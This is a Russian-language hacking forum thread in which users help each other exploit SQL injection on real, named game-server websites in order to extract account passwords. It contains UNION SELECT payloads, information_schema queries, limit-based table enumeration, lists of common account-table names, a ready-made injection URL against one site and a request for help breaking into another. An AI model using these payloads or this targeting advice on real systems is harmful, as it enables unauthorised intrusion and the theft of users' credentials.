2 of69
Смотришь database(), если запрос возвращает к примеру db1, то меняешь запрос на ...+from+db1.g2_User...
Если не прокатывает, то смотришь в какой базе эта таблица лежит.
...select+table_schema+from+information_schema.col umns+where+table_name=g2_User...
Не забудь закодировать имя таблицы char`ои или hex'ом. Ну и соответственно полученной базе составляешь запрос.

2 Calcutta
Никакого посимвольного подбора. Юзай limit. ^^
Поочередно меняешь limit+0,1/*, limit+1,1/*, 2,1 и т.д. Все таблички как на ладошке.

Лол, под пароли не создается спец. таблица

Ищи на форуме списки распространенных названий пользовательских таблиц.

account
accounts
game_accounts
sup_auth
la2_auth

и т.д.

распространенные пробовал уже, практически все те что есть на форуме.
значит у меня должен будет быть запрос примерно такой:
http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,concat_ws(0x3a,[название таблиц с паролями],[id аккаунта]),4,5,6,7,8+from+[таблица с аккаунтами (к примеру, accounts)]/*

Подскажите что это?

Ну если дословно... Это неуспешное выполнение какой-то функции. Причина - попытка выборки из несуществующей таблицы "jos_session" в базе "db0742011".

а как это можно исправить и как хакер может этим воспользоваться?

ссылку, пожалуйста, выложи =) а там мож чем и сможем помочь.
//обложился распечатками статей.. всё-таки тяжело одному сидеть разбираться -))
//может кто подсказать по моей инъекции, а то мозг разрывает уже -)) второй день пытаюсь расковырять где там пароли лежат. а если кто доработает, то на плюсики не поскуплюсь

http://www.battle.rapx.net.ru/index.php

1d37r, ну то, что не работает хакер вряд ли использует... Кода я не видел, поэтому не знаю как передаётся этот хеш скриптам, и что фильтруется... Если параметр, в котором передаётся хеш уязвим к SQL-Injection, то можно провести атаку. Настчёт исправления опять же... Ты смотрел - эта таблица, из которой идёт выборка есть?